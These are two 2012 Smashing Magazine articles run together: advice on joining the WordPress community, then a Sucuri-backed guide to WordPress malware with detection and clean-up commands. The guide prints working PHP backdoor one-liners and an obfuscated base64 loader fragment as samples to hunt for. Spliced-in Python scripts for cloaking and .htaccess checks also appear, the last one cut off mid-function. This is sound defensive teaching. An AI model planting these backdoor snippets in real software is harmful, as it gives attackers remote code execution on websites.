Don’t just rush in with your awesome idea, making yourself look a little dumb in the process (though even that can be a good learning experience). Take the time to learn how the community works and functions, along with the etiquette, before you dive in.

Get Involved

People gathered at WordCamp Netherlands 2012. (Image: Erno Hannick)

Now that you have learned the basics of WordPress, it’s time to start getting involved. Of course, you could go it alone, and there are plenty of people running successful WordPress businesses who have nothing to do with the community. But there are so many reasons to get involved that you should jump straight in. Here’s why.

  • The community provides a free training ground where experts will give you feedback and help you to make WordPress better.
  • If you’re freelancing or running your own business, the WordPress community can provide support and human connections in what can be an isolating situation.
  • By getting involved with WordPress, you’re helping to create a better product which everyone can benefit from.

Follow Make WordPress.org

Make WordPress.org is where you can find blogs for all the contributor groups.

Where there used to be mailing lists, now there are blogs. All of the different contributor groups are gathered together at Make WordPress.org. You can follow all of them or check out the ones that are relevant to you. The Make WordPress.org blogs are:

  • Core
  • Plugins
  • Accessibility
  • Support (including support forums and docs)
  • UI
  • Themes
  • Polyglots
  • Events
  • Systems

There is something for everyone, and each blog has a vibrant community working in their area to make WordPress better. Each group has its own lead who is responsible for shepherding, wrangling and leading the team.

Support Others

The WordPress support forums are an excellent resource for WordPress users, but they’re also a great place for you to hone your WordPress skills. We learn best by teaching things to other people. I have learned 95% of what I know about WordPress from writing articles about it. Equally, answering questions in the support forums will help to clarify your own knowledge of WordPress. When you can explain a concept clearly to someone else, you know that you’ve got it — answering support questions is a great tool for that.

And not only will it help to clarify your own thinking, but it introduces you to different perspectives. Here’s Epstein:

“If you want to learn about WordPress, there is no faster way to figure out the nitty gritty than to try to help people. You can only imagine what you can dream up, but the millions of users out there come to this from a totally different place, and they have myriad different ideas. Bar none, I learned more about WordPress by helping than I did by ‘researching.’ Being asked a question and not knowing the answer means you have a goal you never would have given yourself, and it’s inspiring.”

Check out Epstein at the recent WordCamp San Francisco talking about getting involved in the WordPress support forums.

Write About WordPress

You could start off writing about WordPress by heading to the WordPress Codex, finding a random page that needs to be edited and editing it. The Codex is run on MediaWiki, and anyone with a WordPress.org username can edit it. The Codex is always in need of updating and editing, and contributing your own articles will help to hone your WordPress skills. You could also help out with the WordPress user handbook, which is currently in the process of being edited at the Supporting Everything WordPress blog.

WordPress.org isn’t the only place to write about WordPress. If you find a solution to a WordPress problem, write it up on your personal blog. People will find it via Google, and it’ll help them with their own problems. You could also submit a post to a WordPress blog. Many blogs are often looking for guest posts, and some of them are even paid writing gigs! Like providing support, the process of writing things up will make processes and solutions even clearer in your own mind.

Translate WordPress

Around 40% of WordPress downloads are not in the English language — that is a whole lot of non-English language copies of WordPress in the wild. Translating WordPress is a great way to help out and make connections in your local community. Here’s what Zé Fontainhas, the WordPress Polyglots lead, had to say about it:

“Translating WordPress has loads of benefits for you as a WordPress Professional: not only do you increase your karma in both the global and your local community, but in the process you get to look at the code more closely than most. You may pick up bugs or improvements that no one else sees, and this unique perspective will teach you far more about WordPress than the average WordPress user will ever pick up.”

Meet the Community

Working online is great, but there’s nothing like meeting your peers face-to-face to create stronger and deeper relationships. The WordPress Foundation supports two types of WordPress events: WordCamps and Meetups. WordCamps are large annual conferences, usually two days long, at which WordPress experts and enthusiasts gather to share their experience of WordPress. Meetups are more regular, often once a month, and are short informal gatherings that might involve hacking or presentations. Attend events, and, once you feel confident enough, speak at them. Don’t feel that you have to be a WordPress genius to give a presentation. If you’ve done something useful that is worth sharing, then share it. Having been to three WordCamps this year already, I can’t stress how important they are in terms of building relationships, friendships and your profile. You can check out my write-up of WordCamp Netherlands to learn more about them.

Form Relationships

There are times in the WordPress community when arguments erupt between personalities, and people are yelling at each other on Twitter or flaming in comment threads. But this is the exception, not the norm. While that is going on, there are hundreds of people working on WordPress itself, and thousands of people all over the world building WordPress businesses, who are working at improving WordPress.

From my own experience, I wouldn’t have built my own business if I didn’t have developers to ask dumb questions of, designers to make things look good for me, other WordPress experts to offer advice and help me to improve. At the same time, I offer advice on writing, proofreading and editing where I can. The diverse group of people whom I consider to be my closest WordPress peers have been invaluable in getting me to where I am today, and will no doubt take a role in shaping my future. These relationships are important. Seek out people you can work with and hold on to them.

Get Ahead

Get ahead of the race. (Image: Tambako the Jaguar)

Know Who to Ask

By forming relationships with the right people, you’re on the first step to getting ahead. These don’t need to be the most prominent people, but rather people with knowledge and expertise, people who you can trust. You don’t need to be the best developer to make it in WordPress, sometimes it’s just a matter of knowing the right people to answer your questions. This does not mean (and this is important) that you find out who the best people are and bug them on Twitter, nor should you call people at 4 a.m. to ask them for help finding WordPress themes (true story). By building relationships and interacting with the community, you’ll have a whole collection of people who can help you with issues whether it’s caching or media queries or finding a good developer or finding the right hosting company. Getting ahead isn’t always about being the best at something yourself; it’s just knowing the right people and asking the right questions.

Know What’s Happening

If you want to get ahead, you need to know more than just WordPress as it is in the current release. You should stay up-to-date with what will be appearing in WordPress, and not just in Core but in the wider community. If you’re working with clients in any capacity, you should know what’s in store for them in upcoming WordPress releases. There are plenty of ways to do this.

  • Run the nightly builds
    Keep the nightly builds installed on a local WordPress installation. This will keep you up-to-date with any changes as they happen.
  • Keep up with Core development
    You can follow what’s going on in Core in a number of ways: following Make WordPress Core, keeping up with the recent development chats and following WordPress Trac. You can also follow @wordpresstrac on Twitter for live updates in your feed.
  • Follow user interface (UI) changes
    Major changes to the UI can be confusing for unprepared WordPress users. Keep your clients and customers informed of any updates by watching the Make WordPress UI blog.

Call Things Out (Without Trolling)

Once you’ve gotten to know WordPress well, are engaged with the community and are aware of all of the nuances around it, you’ve gotten yourself into a great position for calling things out when you see a problem. Some problems don’t warrant a public airing, others do. Here are some great examples of criticisms of WordPress or the community that have led to extensive debate and discussion in the comments:

Know When to Take a Break

Don’t get rid of your TV, and definitely don’t throw away your computer games, or your books or any of the other things you love to do. For the first few years I worked on WordPress, I was working all day and all night. Even now, I regularly clock off after midnight. Working with WordPress, running your own business and getting involved with the community can be intense. There are a lot of personalities; there are clashes and arguments and upsets that will get to you. This could be anything from a rude person on a support forum, to a flashpoint on Twitter, to just feeling overworked and tired. You need to have things that you can do to switch off and take a break.

Andrea Rennick is part of the support team at StudioPress, co-author of WordPress All-in-One for Dummies and runs WordPress eBooks. She’s an avid quilter.

“I have my sewing table set up right next to my desk. I can swivel from one to the other. Quilting gives my brain something else to work on, whatever problem I may be focused on. It’s hard to be distracted when there is a sharp needle running up & down at top speeds right next to your fingers. It also gets me up and moving, out of my chair. Selecting fabric, cutting the pieces and especially the basting process give me another reason to not sit for yet another hour.”

Whether it’s quilting, opening a bakery, doing yoga, driving fast cars or whatever, it is essential to step back from the WordPress world, switch off your brain and get a little perspective from time to time.

Keep Listening

Once you’ve got to the top, you still need to listen. Other people continue to have different perspectives from you and no matter how right you think you are, there are cases where you are going to be wrong. It may be that you’re so wrapped in WordPress that it takes an absolute beginner to point out something that you’re missing, or you’re lacking the knowledge in a specific area. Getting to the top doesn’t mean you know all things about everything, just that you’re really good about something. Keep listening to those who are also really good, and even those who aren’t.

Miller highlights another great reason to keep listening.

“Look for people’s pain points and frustrations. Those are opportunities to serve people AND make money doing it. The best products and services fill gaps in where WordPress can’t or stops short. Innovate and make something better, which often means saving people time, energy, headaches and money.”

Conclusion

In his article, Wold suggests that the top 20% of developers earn more than $50 an hour. That’s not entirely true. The WordPress survey didn’t only gather info from developers, but from people like me, other WordPress professionals who have built businesses around writing, project management, design, support, blogging, training, consulting or any of the myriad things that you can do with WordPress. And there are plenty of WordPress professionals who are earning far in excess of $50 per hour.

There are other rewards too, beyond the financial. Our world is increasingly fragmentary, especially for those of us who make our livelihoods online. Being part of a community means having people to communicate with, to share ideas and collaborate, to form business partnerships and friendships. If you want to take the easiest route to the top, and have fun while you’re doing it, then it’s by listening, learning, sharing, collaborating and contributing.



© Siobhan McKeown for Smashing Magazine, 2012.


Security: Common WordPress Malware Infections


  

WordPress security is serious business. Exploits of vulnerabilities in WordPress’ architecture have led to mass compromises of servers through cross-site contamination. WordPress’ extensibility increases its vulnerability; plugins and themes house flawed logic, loopholes, Easter eggs, backdoors and a slew of other issues. Firing up your computer to find that you’re supporting a random cause or selling Viagra can be devastating.

WordPress Security

In WordPress core, security issues are addressed quickly; the WordPress team is focused on strictly maintaining the integrity of the application. The same, however, cannot be said for all plugins and themes.

The focus of this post is not to add to the overwhelming number of WordPress security or WordPress hardening posts that you see floating around the Web. Rather, we’ll provide more context about the things you need to protect yourself from. What hacks are WordPress users particularly vulnerable to? How do they get in? What do they do to a WordPress website? In this lengthy article, we’ll cover backdoors, drive-by downloads, pharma hack and malicious redirects. Please notice that some anti-virus apps report this article as malware, probably because it contains examples of the code that should be avoided. This article does not contain any malware itself, so the alert must be based on heuristic analysis.

Over the past two years, Web malware has grown around 140%. At the same time, WordPress has exploded in popularity as a blogging platform and CMS, powering close to 17% of websites today. But that popularity comes at a price; it makes WordPress a target for Web-based malware. Why? Simple: its reach provides the opportunity for maximum impact. Sure, popularity is a good thing, but it also makes us WordPress users vulnerable.

A Bit About Our Security Expert: Meet Tony

Lacking the technical knowledge needed to go into great depth, I brought on board a co-author to help me out. Bringing the technical information is Tony Perez, Chief Operations and Financial Officer of Sucuri Security. Sucuri Security provides detection, alerting and remediation services to combat Web-based malware. In other words, it works on websites that have been compromised. This means that Tony has the background, statistics and, most importantly, knowledge to go really in depth on malware issues that affect WordPress users.

I asked Tony how he got into Web security:

Tony

“I think it goes back to 2009. I was managing and architecting large-scale enterprise solutions for Department of Defense (DoD) clients and traveling the world. In the process, there was a little thing called compliance with the Security Technical Implementation Guide (STIG), set forth by the Defense Information Systems Agency (DISA). I know, a mouthful, but it’s how we did things in the DoD; if it didn’t have an acronym, it didn’t belong.

That being said, it wasn’t until I joined Dre and Daniel at Sucuri Security, in early 2011, that I really began to get what I consider to be any resemblance of InfoSec chops.”

Armed with Tony’s technical knowledge, we’ll look at the main issues that affect WordPress users today. But before we get into details, let’s look at some of the reasons why WordPress users might be vulnerable.

What Makes WordPress Vulnerable?

Here’s the simple answer. Old versions of WordPress, along with theme and plugin vulnerabilities, multiplied by the CMS’ popularity, with the end user thrown into the mix, make for a vulnerable website.

Let’s break that down.

The first issue is outdated versions of WordPress. Whenever a new WordPress version is released, users get a nagging message, but plenty of users have gotten pretty good at ignoring the nag. Core vulnerabilities in themselves are rarely an issue. They do exist; proof can be found in the most recent 3.3.3 and 3.4.1 releases. WordPress’ core team has gotten pretty good at rolling out security patches quickly and efficiently, so the risk of exploitation is minimal, provided that WordPress users update their installation. This, unfortunately, is the crux of the problem: WordPress users ignore the message. And it’s not just inexperienced and casual WordPress users who aren’t updating. A recent high-profile hack was of the Reuters website, which was running version 3.1.1 instead of the current 3.4.1.

Vulnerabilities in plugins and themes are another issue. The WordPress repository has 20,000 plugins and is growing. The plugins are of varying quality; some of them inevitably have security loopholes, while others are outdated. On top of that, consider all of the themes and plugins outside of the repository, including commercial products that are distributed for free on warez websites and come packed with malware. Google is our favorite search engine, but it’s not so hot for finding quality WordPress themes.

Then, there’s popularity. WordPress is popular, without a doubt. Around 700 million websites were recorded as using WordPress in May of this year. This popularity means that if a hacker can find a way into one WordPress website, they have potentially millions of websites for a playground. They don’t need to hack websites that use the current version of WordPress; they can scan for websites that use old insecure versions and hack those.

Finally and most significantly, the biggest obstacle facing WordPress users is themselves. Tony in his own words:

“For whatever reason, there is this perception among WordPress users that the hardest part of the job was paying someone to build the website and that once it’s built, that’s it, it’s done, no further action required. Maybe that was the case seven years ago, but not today.

WordPress’ ease of use is awesome, but I think it provides a false sense of assurance to end users and developers alike. I think, though, this perception is starting to change.”

From Tony’s experience at Sucuri Security, the most common vulnerabilities to website exploits are:

  • Out of date software,
  • Poor credential management,
  • Poor system administration,
  • Soup-kitchen servers,
  • Lack of Web knowledge,
  • Corner-cutting.

A bit of time and education are all it takes to remedy these issues and to keep your WordPress website secure. This means not just ensuring that you as a WordPress expert are educated, but ensuring that the clients you hand over websites to are as well.

The Evolution Of Attacks

As the Internet has evolved, the nature of hacking has evolved with it. Hacking started out as a very different animal. Back in the day, it was about showing your technical prowess by manipulating a website to do things beyond the webmaster’s intentions; this was often politically motivated. One day you’d wake up and find yourself supporting the opposition in Nigeria or Liberia. These days, hacking is all about money. The recent DNSChanger malware (i.e. the “Internet Doomsday” attack), for example, let hackers rake in close to $14 million before being stopped by the FBI and Estonian police last November.

Another hacking technology that has emerged is malnets. These distributed malware networks are used for everything including identity theft, DDoS attacks, spam distribution, drive-by downloads, fake AV and so on. The hackers automate their attacks for maximum exposure.

Automation through the use of bots is not their only mechanism. Today you also have malware automation: the use of tools to quickly generate a payload (i.e. the infection), allowing the attacker to focus strictly on gaining access to the environment. Once the hacker has access to the environment, they copy and paste in the auto-generated payload. One of the more prevalent automation tools is the Blackhole Exploit Kit. This and many other kits can be purchased online for a nominal fee. That fee buys sustainment services and keeps the kit updated with new tools for the latest vulnerabilities. It’s a true enterprise.

Common WordPress Malware Issues

Thousands of malware types and infections are active on the Internet; fortunately, not all apply to WordPress. For the rest of this post, we’ll look at four of the most common attacks on WordPress users:

Backdoor

A backdoor lets an attacker gain access to your environment via what you would consider to be abnormal methods — FTP, SFTP, WP-ADMIN, etc. Hackers can access your website using the command line or even using a Web-based GUI like this:

Screenshot: a backdoor GUI.

Backdoors are exceptionally dangerous. Left unchecked, the most dangerous can cause havoc on your server. They are often attributed to cross-site contamination incidents — i.e. when websites infect other websites on the same server.

How am I attacked?

The attack often happens because of out-of-date software or security holes in code. A vulnerability well known to the WordPress community was found in the TimThumb script that was used for image resizing. This vulnerability made it possible for hackers to upload a payload that functioned as a backdoor.

Here is an example of a scanner looking specifically for vulnerable versions of TimThumb:

Screenshot

What does it look like?

Like most infections, this one can be encoded, encrypted, concatenated or some combination thereof. However, it’s not always as simple as looking for encrypted code; there are several instances in which it looks like legitimate code. Here is an example:

Screenshot

Another example:

Screenshot

Below is a case where the content is hidden in the database and targets WordPress installations:

return @eval(get_option('blogopt1'));

And here is a very simple backdoor that allows any PHP request to execute:

eval (base64_decode($_POST["php"]));

Here is an example of a messy backdoor specifically targeting the TimThumb vulnerability:

Screenshot

Here is another backdoor that commonly affects WordPress installations, the Filesman:

Screenshot

How can I tell whether I’m infected?

Backdoors come in all different sizes. In some cases, a backdoor is as simple as a file name being changed, like this:

  • wtf.php
  • wphap.php
  • php5.php
  • data.php
  • 1.php
  • p.php

In other cases, the code is embedded in a seemingly benign file. For instance, this was found in a theme’s index.php file, embedded in legitimate code:

Screenshot

Backdoors are tricky. They constantly evolve, so there is no definitive way to say what you should look for.

How do I prevent it?

While backdoors are difficult to detect, preventing them is possible. For the hack to be effective, your website needs an entry point that is accessible to the hacker. You can close backdoors by doing the following:

  1. Prevent access.
    Make your environment difficult to access. Tony recommends a three-pronged approach to locking down wp-admin:

    • Block IPs,
    • Two-factor authentication,
    • Limited access by default.

    This will make it extremely difficult for anyone except you to access your website.

  2. Kill PHP execution.
    Often the weakest link in any WordPress chain is the /uploads/ directory. It is the only directory that needs to be writable in your installation. You can make it more secure by preventing anyone from executing PHP. It’s simple to do. Add the following to the .htaccess file at the root of the directory. If the file doesn’t exist, create it.
# Apache 2.4 and later: use "Require all denied" in place of the Order/Deny lines
<FilesMatch "\.php$">
Order Deny,Allow
Deny from All
</FilesMatch>

How is it cleaned?

Once you have found a backdoor, cleaning it is pretty easy — just delete the file or code. However, finding the file can be difficult. On his blog, Canton Becker provides some advice on ways to scour your server for backdoors. There is no silver bullet for backdoors, though, or for any infection — backdoors can be simple or complex. You can try doing some basic searches for eval and base64_decode, but if your code looks like what’s below, then knowing what to look for becomes more difficult:

$XKsyG='as';$RqoaUO='e';$ygDOEJ=$XKsyG.'s'.$RqoaUO.'r'.'t';$joEDdb='b'.$XKsyG.
$RqoaUO.(64).'_'.'d'.$RqoaUO.'c'.'o'.'d'.$RqoaUO;@$ygDOEJ(@$joEDdb('ZXZhbChiYXN
lNjRfZGVjb2RlKCJhV1lvYVhOelpY…

If you are familiar with the terminal, you could log into your website using SSH and try certain methods. The most obvious and easiest method is to look for this:

# grep -ri "eval" [path]

Or for this:

# grep -ri "base64_decode" [path]

The r ensures that all files are scanned, while the i ensures that the scan is case-insensitive. This is important because you could find variations of eval: Eval, eVal, evAl, evaL or any other permutation. The last thing you want is for your scan to fall short because you were too specific.

Look for recently modified files:

find . -type f -ctime -1 | more

The -type f option looks for regular files, and -ctime restricts your scan to files whose status changed recently: specify -1 for the last 24 hours or -2 for the last 48 hours (note that -ctime -0 matches nothing).

Another option is to use the diff command. This enables you to detect the differences between files and directories. In this case, you would use it for directories. For it to be successful, though, you need to have clean copies of your installation and themes. So, this works only if you have a complete backup of your website.

# diff -r /[path]/[live-directory] /[path]/[backup-directory] | sort

The -r option is recursive through all directories, and the sort command sorts the output and makes it easier to read. The key here is to quickly identify the things that don’t belong so that you can run integrity checks. Anything you find that is in the live website’s directory but not in the backup directory warrants a second look.

Drive-By Downloads

A drive-by download is the Web equivalent of a drive-by shooting. Technically, it is usually embedded on your website via some type of script injection, which could be associated with a link injection.

The point of a drive-by download is often to download a payload onto your user’s local machine. One of the most common payloads informs the user that their website has been infected and that they need to install an anti-virus product, as shown here:

How does the attack get in?

There are a number of ways an attack can get in. The most common causes are:

  • Out of date software,
  • Compromised credentials (wp-admin, FTP),
  • SQL injection.

What does it look like?

Below are a number of examples of link injections that lead to some type of drive-by download attack:

Screenshot

And this:

Screenshot

And this:

Screenshot

More recently, drive-by downloads and other malware have been functioning as conditional malware — designed with rules that have to be met before the infection presents itself. You can find more information about how conditional malware works in Sucuri’s blog post “Understanding Conditional Malware.”

How can I tell whether I’m infected?

Using a scanner such as SiteCheck to see whether you are infected is possible. Scanners are pretty good at picking up link injections. Another recommendation is to sign up for Google Webmaster Tools and verify your website. In the event that Google is about to blacklist your website, it would email you beforehand notifying you of the problem and giving you a chance to fix it. The free service could pay dividends if you’re looking to stay proactive.

Outside of using a scanner, the difficulty in identifying an infection will depend on its complexity. When you look on the server, it will look something like this:

Screenshot

The good news is that such an infection has to be somewhere where an external output is generated. The following files are common places where you’ll find link injections:

  • wp-blog-header.php (core file)
  • index.php (core file)
  • index.php (theme file)
  • functions.php (theme file)
  • header.php (theme file)
  • footer.php (theme file)

About 6 times out of 10, the infection will be in one of those files. Also, your anti-virus software might detect a payload being dropped onto your computer when you visit your website — another good reason to run anti-virus software locally.

Sucuri has also found link injections embedded in posts and pages (as opposed to an originating PHP file), as well as in text widgets. In such cases, scrub your database and users to ensure that none of your accounts have been compromised.

How is it cleaned?

Cleaning can be a challenge and will depend on your technical skill. You could use the terminal to find the issue.

If you have access to your server via SSH, you’re in luck. If you don’t, you can always download locally. Here are the commands that will be of most use to you when traversing the terminal:

  • CURL
    Used to transfer data with a URL syntax.
  • FIND
    Search by file or directory name.
  • GREP
    Search for content in files.

For example, to search all of your files for a particular section of the injection, try something like this:

$ grep -r "http://objectcash.in" .

Including the following characters is important:

  • "
    Maintains the integrity of the search. Using it is important when you’re searching for special characters because some characters have a different meaning in the terminal.
  • -r
    Means “recursive” and will traverse all directories and files.

You can also refine your search by file type:

$ grep --include "*.php" -r "http://objectcash.in" .

The --include option restricts the search to files whose names match the given pattern; in this instance, only PHP files.

These are just a few tricks. Once you’ve located the infection, you have to ensure that you remove every instance of it. Leaving just one could lead to serious frustration in the future.

Pharma Hack

Pharma hack is one of the most prevalent infections around. It should not be confused with malware; it’s actually categorized as SPAM — “stupid pointless annoying messages.” If you’re found to be distributing SPAM, you run the risk of being flagged by Google with the following alert:

This site may be compromised!!

This is what it will look like on Google’s search engine results page (SERP):

How am I attacked?

The pharma SPAM injection makes use of conditional malware that applies rules to what the user sees. So, you may or may not see the page above, depending on various rules. This is controlled via code on the server, such as the following:

Screenshot

Some injections are intelligent enough to create their own nests within your server. The infection makes use of $_SERVER["HTTP_REFERER"], which redirects the user to an online store that is controlled by the attacker to generate revenue. Here is an example of such a monetized attack:

Screenshot

Like most SPAM-type infections, pharma hack is largely about controlling traffic and making money. Money can be made through click-throughs and/or traffic. Very rarely does a pharma hack injection redirect a user to a malicious website that contains some additional infection, as with a drive-by download attempt.

This is why it’s so difficult to detect. It’s not as simple as querying for “Cialis” or “Viagra,” although that’d be awesome. Most people would be surprised by the number of legitimate pharmaceutical companies that exist and publish ads on the Web. This adds to the challenge of detecting these infections.

What does it look like?

Pharma hack has evolved, which has made it more difficult to detect. In the past, SPAM injections would appear in your pages, where they were easy to find and, more importantly, remove.

Today, however, pharma hack is quite different. It uses a series of backdoors, sprinkled with intelligence, to detect where traffic is coming from, and then it tells the infection how to respond. Again, it can behave as conditional malware. More and more, pharma hack reserves its payload for Google’s bots; the goal is to make it onto Google’s SERPs. This provides maximum exposure and the biggest monetary return for the hackers.

Here’s an image of an old pharma hack injecting SPAM into a blog’s tags:

Screenshot: a blog’s tags injected with pharma hack tags.

Another version of pharma hack was injected in such a way that when the user clicks on an apparently benign link (such as “Home,” “About” or “Contact”), it redirects the user to a completely different page. Somewhere like this:

How do I tell whether I’m infected?

Identifying an infection can be very tricky. In earlier permutations, identifying an infection was as easy as navigating your website, looking at your ads, links, posts and pages, and quickly determining whether you’ve been infected. Today, there are more advanced versions that are harder to find.

The good news for diligent webmasters is that by enabling some type of auditing or file monitoring on your WordPress website, you’ll be able to see when new files have been added or when changes have been made. This is by far one of the most effective methods of detection.

You could try using free scanners, such as SiteCheck. Unfortunately, many HTTP scanners, including Sucuri’s, struggle with the task because pharma hack is not technically malicious, so determining the validity of content can be difficult for a scanner.

How is it cleaned?

First, identify the infected files, and then remove them. You can use the commands we’ve outlined above, and you can make queries to your website via the terminal to quickly see whether you’re serving any pharma SPAM to your visitors.

When combatting pharma hacks, one of the most useful commands is grep. For example, to search for any of the ads or pharma references being flagged, run this:

# egrep -wr 'viagra|pharmacy' .

By using egrep, we’re able to search multiple words at the same time if necessary, thus saving you time in this instance.

Or try something like this:

# grep -r "http://canadapharmacy.com" .

This only works if the infection is not encoded, encrypted or concatenated.

Another useful method is to access your website via different user agents and referrers. Here is an example of what one website looked like when using a Microsoft IE 6 referrer:

Try Bots vs Browsers to check your website through a number of different browsers.

Terminal users can also use CURL:

# curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" http://somesite.com
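The user-agent and referrer checks just described, automated. This is an added example, not Sucuri’s or Smashing Magazine’s code: it fetches a page as a plain browser, as a visitor arriving from Google, as Googlebot and as IE 6, then reports which responses differ from the plain one, which contain pharma terms, which add off-site links and which redirect. The profile names, the sample_fetch responder and the .example domains are constructed for this example.

```python
#!/usr/bin/env python3
"""Cloaking probe (added example; not Sucuri's or Smashing's code): request a
page as several clients and report where the served HTML differs, carries
pharma terms, adds off-site links or redirects.  The profiles and the sample
responder are constructed for this example."""
import json
import re
import sys
import urllib.request
from urllib.parse import urlparse

# One header set per client the text says an infection may treat differently.
PROFILES = {
    "direct": {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) Firefox/14.0"},
    "google-referrer": {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) Firefox/14.0",
                        "Referer": "https://www.google.com/search?q=example"},
    "googlebot": {"User-Agent": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"},
    "msie6": {"User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"},
}
SPAM_TERMS = re.compile(r"\b(viagra|cialis|levitra|pharmacy)\b", re.I)
HREF = re.compile(r"""href=["'](https?://[^"']+)""", re.I)
REDIRECT = re.compile(r"http-equiv=[\"']?refresh|window\.location|document\.location", re.I)


def http_fetch(url, headers, timeout=10):
    """Real fetch, used when the script is pointed at a site you own."""
    req = urllib.request.Request(url, headers=headers)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def normalise(html):
    """Drop comments and collapse whitespace so trivial noise is not 'cloaking'."""
    html = re.sub(r"<!--.*?-->", "", html, flags=re.S)
    return re.sub(r"\s+", " ", html).strip()


def external_links(html, own_host):
    """Absolute links whose host is not the site's own."""
    return sorted({u for u in HREF.findall(html) if urlparse(u).hostname != own_host})


def probe(url, fetch=http_fetch, profiles=PROFILES):
    """Fetch `url` once per profile and compare every response with 'direct'."""
    own_host = urlparse(url).hostname
    pages = {name: normalise(fetch(url, headers)) for name, headers in profiles.items()}
    base_links = set(external_links(pages["direct"], own_host))
    report = {
        "differs_from_direct": sorted(n for n, body in pages.items() if body != pages["direct"]),
        "spam_terms": {n: sorted({t.lower() for t in SPAM_TERMS.findall(body)})
                       for n, body in pages.items()},
        "injected_links": {n: sorted(set(external_links(body, own_host)) - base_links)
                           for n, body in pages.items()},
        "redirects": {n: bool(REDIRECT.search(body)) for n, body in pages.items()},
    }
    report["cloaked"] = bool(report["differs_from_direct"])
    return report


def sample_fetch(url, headers):
    """Constructed stand-in for an infected site: clean for ordinary visitors,
    hidden pharma links for Googlebot, an off-site redirect for old IE."""
    ua = headers.get("User-Agent", "")
    page = ("<html><body><h1>My happy site</h1>"
            "<a href='http://myhappysite.example/about'>About</a></body></html>")
    if "Googlebot" in ua:
        return page.replace("</body>", "<div style='display:none'>cheap viagra "
                            "<a href='http://pharmacy.example/buy'>online pharmacy</a></div></body>")
    if "MSIE 6" in ua:
        return ("<html><head><meta http-equiv='refresh' "
                "content='0;url=http://meansite.example/stats.php'></head></html>")
    return page


if __name__ == "__main__":
    # With a URL argument the probe hits that site; without one it runs
    # against the constructed responder so the output can be inspected offline.
    if len(sys.argv) > 1:
        result = probe(sys.argv[1])
    else:
        result = probe("http://myhappysite.example/", fetch=sample_fetch)
    print(json.dumps(result, indent=2))
```

Any profile listed under differs_from_direct is being served something a plain visitor never sees; that alone is worth a file-level search, even when spam_terms is empty, because the injected content may be links or a redirect rather than the obvious keywords.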

How do I prevent it?

Preventing a pharma hack can be tricky. Sucuri has found that the hack regularly exploits vulnerable out-of-date software. However, your out-of-date WordPress installation is not necessarily the problem. Even if you are up to date, another outdated installation on the same server could be vulnerable to the infection. If the real payload resides elsewhere on your server, not within your website’s directory, then catching it can be exceptionally difficult.

Here is an example of what you might be looking for if you can’t find the infection in your own installation:

Screenshot

To prevent a pharma hack, you should do two things:

  1. Keep your software up to date,
  2. Steer clear of soup-kitchen servers.

Malicious Redirects

A malicious redirect sends a user to a malicious website. In 2010, 42,926 new malicious domains were detected. In 2011, this number grew to 55,294. And that just includes primary domains, not all of their subdomains.

When a visitor is redirected to a website other than the main one, the website may or may not contain a malicious payload. Suppose you have a website at myhappysite.com; when someone visits it, the website could take the visitor to meansite.com/stats.php, where the malicious payload is in that website’s stats.php file. Or it could be a harmless website with just ads and no malicious payload.

How am I attacked?

As with many malware attacks, it comes down to access. The malicious redirect could be generated by a backdoor. The hacker would scan for a vulnerability, such as TimThumb or old versions of WordPress and, when they find it, upload a payload that functions as a backdoor.

What does it look like?

Detecting a redirect is not as complex as detecting some of the other infections. It is often found in your .htaccess file and looks something like this:

Screenshot

Or like this:

Screenshot

There may be instances where a redirect is encoded and resides in one of your PHP files. If so, it will usually be found in your header.php, footer.php or index.php file; it has also been known to reside in the root index.php file and in other core template files. It is not always encoded, but if it is, it will look something like this:

Screenshot

How do I tell if I am infected?

There are a few ways to check for infections. Here are some suggestions:

  • Use a free scanner, such as SiteCheck. They very rarely miss malicious redirects.
  • Test using Bots vs Browsers.
  • Listen to your users. You might not detect the redirect, but sometimes a user will alert you to it.

If a user does detect a problem, ask them pertinent questions to help diagnose the problem:

  • What operating system are they using?
  • What browser(s) are they using, and which version(s)?

The more information you get from them, the better you can replicate the issue and find a fix.

How is it cleaned?

Malicious redirects are one of the easiest infections to clean. Here’s a good starting point:

  1. Open your .htaccess file.
  2. Copy any rewrite rules that you have added yourself.
  3. Identify any malicious code, like the sample above, and remove it from the file. Scroll all the way to the bottom of .htaccess to make sure there aren’t any error directives pointing to the same infection.

Be sure to also look for all .htaccess files on the server. Here is one quick way to see how many exist on your server:

# find [path] -name .htaccess -type f | wc -l

And this will tell you where exactly those files are:

# find [path] -name .htaccess -type f | sort

The infection is not always restricted there, though. Depending on the infection, you might also find the redirect encoded and embedded in a file such as index.php or header.php.

Alarmingly, these infections can replicate across all of your .htaccess files. The backdoor responsible for it can also be used to create multiple .htaccess files across all of your directories, all with the same infection. Removing the infection can feel like an uphill struggle, and sometimes cleaning every file you can find is not enough. There are even cases where a file is created outside of the Web directory. The lesson is always look outside of your Web directory as well as within it.
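The .htaccess clean-up steps above as a script. This is an added example, not Sucuri’s or Smashing Magazine’s code: it finds every .htaccess under a path, flags RewriteRule, Redirect and ErrorDocument directives whose target host is not one you trust, flags RewriteCond lines keyed on the user agent or referrer, and groups files that carry identical flagged lines, which is the replication pattern described above. The sample tree, the meansite.example target and the trusted host name are constructed.

```python
#!/usr/bin/env python3
"""Audit every .htaccess under a WordPress tree for redirect-style directives
that point off-site or key on the visitor's browser or referrer (added
example; not Sucuri's or Smashing's code).  Sample tree and hosts are
constructed for this example."""
import os
import re
import tempfile
from urllib.parse import urlparse

DIRECTIVE = re.compile(
    r"^\s*(RewriteRule|RewriteCond|Redirect(?:Match|Permanent|Temp)?|ErrorDocument)\s+(.*)$", re.I)
URL = re.compile(r"https?://[^\s\"']+", re.I)
CLIENT_KEY = re.compile(r"HTTP_USER_AGENT|HTTP_REFERER", re.I)


def audit_htaccess(text, trusted_hosts):
    """Findings for one file body as (line_no, directive, reason, line)."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = DIRECTIVE.match(line)
        if not m:
            continue
        directive, args = m.group(1), m.group(2)
        for url in URL.findall(args):
            host = urlparse(url).hostname
            if host and host not in trusted_hosts:
                findings.append((n, directive, f"off-site target {host}", line.strip()))
        if directive.lower() == "rewritecond" and CLIENT_KEY.search(args):
            findings.append((n, directive, "rewrite keyed on user agent or referrer", line.strip()))
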